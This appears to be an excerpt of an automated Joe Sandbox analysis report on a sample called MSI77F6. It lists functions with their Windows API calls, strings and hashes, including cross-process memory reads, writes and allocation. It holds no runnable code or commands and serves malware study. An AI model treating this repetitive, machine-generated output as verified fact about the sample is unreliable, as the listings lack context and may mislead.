                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                        • String ID: .lnk
                                        • API String ID: 2683427295-24824748
                                        • Opcode ID: 1f43d85995cb234da5d75fd67b6a5ca194493ffe822bc473f0c982fa27aa4313
                                        • Instruction ID: c3092dcacac1c3d429581dc963dd4432915e64ee4b07813d606bbc57eaa2dad6
                                        • Opcode Fuzzy Hash: 1f43d85995cb234da5d75fd67b6a5ca194493ffe822bc473f0c982fa27aa4313
                                        • Instruction Fuzzy Hash: 90A15B71144305AFC700EF64C895EABB7E9EF98704F40895CF15997192EB74EA09CBA2
                                        Function 0078DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$+
                                        • API String ID: 0-2552117581
                                        • Opcode ID: 1dfca40b89b6c3c58545b550eab0ab7f3ac911cdd47ab51fd9cdcd96311ffd9a
                                        • Instruction ID: b301ea5f9034a2a3db67c708b6313aea3954a6b5e70f0bbc19b6582a06e67893
                                        • Opcode Fuzzy Hash: 1dfca40b89b6c3c58545b550eab0ab7f3ac911cdd47ab51fd9cdcd96311ffd9a
                                        • Instruction Fuzzy Hash: 6E510EB5105286DFDF25EF69C444AFA7BA8BF2A310F244055F991AB2D0D73C9C42CB25
                                        Function 007B503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0080DC40,?,0000000F,0000000C,00000016,0080DC40,?), ref: 007B507B
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                          • Part of subcall function 0077B8A7: _memmove.LIBCMT ref: 0077B8FB
                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007B50FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                        • String ID: REMOVE$THIS
                                        • API String ID: 2528338962-776492005
                                        • Opcode ID: 157ea65bc0217f3362cdbccb87a02eaf79e9322f0db0a89dc034578df4813640
                                        • Instruction ID: 4c6429c7c680416894dbfc5f41e85286207cae067041cd1af7715f806159f5f7
                                        • Opcode Fuzzy Hash: 157ea65bc0217f3362cdbccb87a02eaf79e9322f0db0a89dc034578df4813640
                                        • Instruction Fuzzy Hash: 3F417C74A0060DEFCF11EF58C889BAEB7B5BF48344F048069E95AAB252DB789D41CB51
                                        Function 007ACF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007B4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007AC9FE,?,?,00000034,00000800,?,00000034), ref: 007B4D6B
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007ACFC9
                                          • Part of subcall function 007B4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007ACA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 007B4D36
                                          • Part of subcall function 007B4C65: GetWindowThreadProcessId.USER32(?,?), ref: 007B4C90
                                          • Part of subcall function 007B4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007AC9C2,00000034,?,?,00001004,00000000,00000000), ref: 007B4CA0
                                          • Part of subcall function 007B4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007AC9C2,00000034,?,?,00001004,00000000,00000000), ref: 007B4CB6
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007AD036
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007AD083
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @
                                        • API String ID: 4150878124-2766056989
                                        • Opcode ID: 7beec53333627953a0e3dfc007bd9c250575aa8484efab5ac48fce88a7684930
                                        • Instruction ID: b01bca5c001ff0e4d6e7d207d71e5854611e8413a7b5b043b9a9453f230c9165
                                        • Opcode Fuzzy Hash: 7beec53333627953a0e3dfc007bd9c250575aa8484efab5ac48fce88a7684930
                                        • Instruction Fuzzy Hash: E3413D72A00218BFDB10DFA4CC85FEEBB78EF49700F108195EA55BB181DA746E45CB61
                                        Function 007DA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0080DBF0,00000000,?,?,?,?), ref: 007DA4E6
                                        • GetWindowLongW.USER32 ref: 007DA503
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007DA513
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: 45392ab044b1bdbb5994570a8e07d8d761d0165bea345d4ebff67958969fcbdf
                                        • Instruction ID: 7b4cc51edb667636eeb1c2233de12b37d1aa72efcf94c4d9110184f477e8b6d2
                                        • Opcode Fuzzy Hash: 45392ab044b1bdbb5994570a8e07d8d761d0165bea345d4ebff67958969fcbdf
                                        • Instruction Fuzzy Hash: 8531C031200245BBDF219E38DC49BEA7B69FB49324F248726F875922E0C738E8609B50
                                        Function 007C57D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 007C57E7
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 007C581D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CrackInternet_memset
                                        • String ID: ?K|$|
                                        • API String ID: 1413715105-1559644915
                                        • Opcode ID: db7252f631e12a1c235a2d585ebbc2a54deb77b54e6e34e4a4f2dc4d48f48bc3
                                        • Instruction ID: c814580e437c512c34c9dd4a05c714f7a9f05873db12f9dd15a057006612fd6c
                                        • Opcode Fuzzy Hash: db7252f631e12a1c235a2d585ebbc2a54deb77b54e6e34e4a4f2dc4d48f48bc3
                                        • Instruction Fuzzy Hash: 4A313D71800119EBCF11AFA1DC59EEE7FB9FF18350F108019F815A6161DB396956DB60
                                        Function 007DA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007DA74F
                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007DA75D
                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007DA764
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyWindow
                                        • String ID: msctls_updown32
                                        • API String ID: 4014797782-2298589950
                                        • Opcode ID: 8e0c25c129eeabcb7bbd9c79dcecf254185dd09133d38c85494447bee6438542
                                        • Instruction ID: cc6846ed3523b374debcff387f79156653c955881862270c8f2b9619d5e8ef17
                                        • Opcode Fuzzy Hash: 8e0c25c129eeabcb7bbd9c79dcecf254185dd09133d38c85494447bee6438542
                                        • Instruction Fuzzy Hash: E6216DB5600205BFDB10EF64DCC5EA737BDFB497A4B04045AFA019B351C674EC11CA61
                                        Function 007D97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007D983D
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007D984D
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007D9872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: 65aa25261e94c7fb9afba4f40ace44424708a20e170758c9e441f172b562de54
                                        • Instruction ID: 71250de0d7ded667a5cce83b284f58d4c1211607bdb00ee880520251b7467d97
                                        • Opcode Fuzzy Hash: 65aa25261e94c7fb9afba4f40ace44424708a20e170758c9e441f172b562de54
                                        • Instruction Fuzzy Hash: E621D731610118BFDF118F54CC85FBB3BBAEF89B64F018125FA049B290C6799C51D7A0
                                        Function 007DA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007DA27B
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007DA290
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007DA29D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: e3d990c088414500fd147626be1ec6562f8ee7d944154f84da51640c77840a57
                                        • Instruction ID: 0a2cc51c4c36f48c0df90998049ecba9f06991836ca7098a5f3ce975ee9aae9a
                                        • Opcode Fuzzy Hash: e3d990c088414500fd147626be1ec6562f8ee7d944154f84da51640c77840a57
                                        • Instruction Fuzzy Hash: 37112371240308BAEF215F61CC46FAB3BB8FFC8B54F014529FA51A6190D27AA851CB20
                                        Function 00792F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00792F79
                                        • GetProcAddress.KERNEL32(00000000), ref: 00792F80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RoInitialize$combase.dll
                                        • API String ID: 2574300362-340411864
                                        • Opcode ID: 1f7780d7228dc7c8bf61b901a90c1e750b16d659324e7933ebbd01ae4cb4e4f8
                                        • Instruction ID: 8a1505074b03d1db04e9dabd4341b86253667a0927c845bbc38048b2973b9dd6
                                        • Opcode Fuzzy Hash: 1f7780d7228dc7c8bf61b901a90c1e750b16d659324e7933ebbd01ae4cb4e4f8
                                        • Instruction Fuzzy Hash: 72E09A70694305ABDF706F71EC99B6936A6BB44706F108464B202D51A0DBB98855EF09
                                        Function 00793034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00792F4E), ref: 0079304E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00793055
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RoUninitialize$combase.dll
                                        • API String ID: 2574300362-2819208100
                                        • Opcode ID: 4d37d24a27a6c6d5b6457c0ce0f01503c17db357961a8dc98396619ab37ef155
                                        • Instruction ID: 020b4f800a8e81dabbf69e0c512bf6ef82fefd8e5e7d36815cfab1a531cc3de3
                                        • Opcode Fuzzy Hash: 4d37d24a27a6c6d5b6457c0ce0f01503c17db357961a8dc98396619ab37ef155
                                        • Instruction Fuzzy Hash: A0E0B6B0644304EBDB305F61ED1DB293AB6BB44702F108854F20AD61B0CBB94910EF19
                                        Function 007EBA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LocalTime__swprintf
                                        • String ID: %.3d$WIN_XPe
                                        • API String ID: 2070861257-2409531811
                                        • Opcode ID: bf0c15682d0184c9c07564e087b66f0443584c7891ca2e2525a0eadf35e2d6aa
                                        • Instruction ID: 0c3a23c80c0ee5db89098ecb59b14f42750418687d52fdf993824e90c4474691
                                        • Opcode Fuzzy Hash: bf0c15682d0184c9c07564e087b66f0443584c7891ca2e2525a0eadf35e2d6aa
                                        • Instruction Fuzzy Hash: D9E01271C0A05CFACF14D6929D4A9BB777CBB0C300F10C4A2B916D1000D33D9B54AB21
                                        Function 007D20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007D20EC,?,007D22E0), ref: 007D2104
                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 007D2116
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetProcessId$kernel32.dll
                                        • API String ID: 2574300362-399901964
                                        • Opcode ID: 836b6f26ad3c5f0adc3490abd17d33e10338385ececd558bb301ee134c78ef53
                                        • Instruction ID: 5d72ef149ba7105d7f83ee9a69a6c34b39ce9f2ced01bfb94941d539b2020ed6
                                        • Opcode Fuzzy Hash: 836b6f26ad3c5f0adc3490abd17d33e10338385ececd558bb301ee134c78ef53
                                        • Instruction Fuzzy Hash: 82D0A7345003269FD7315F60F80D61237E6FB14300B01C41AE699D1356D77CC8C1CA20
                                        Function 0078E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0078E6D9,?,0078E55B,0080DC28,?,?), ref: 0078E6F1
                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0078E703
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: IsWow64Process$kernel32.dll
                                        • API String ID: 2574300362-3024904723
                                        • Opcode ID: 324679abd39d8563b8d614094329029a6663f1db294cddb51ab8014ecccf456e
                                        • Instruction ID: d9600690d23b76bb9e282f1756b4f31c02f9c03070e37f5c239f19066536267a
                                        • Opcode Fuzzy Hash: 324679abd39d8563b8d614094329029a6663f1db294cddb51ab8014ecccf456e
                                        • Instruction Fuzzy Hash: DBD05238440322AAD7303B60AC486133BEABB04300B02842AE4A5D2262DBB8C880CB11
                                        Function 0078E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0078E69C,76230AE0,0078E5AC,0080DC28,?,?), ref: 0078E6B4
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0078E6C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                        • API String ID: 2574300362-192647395
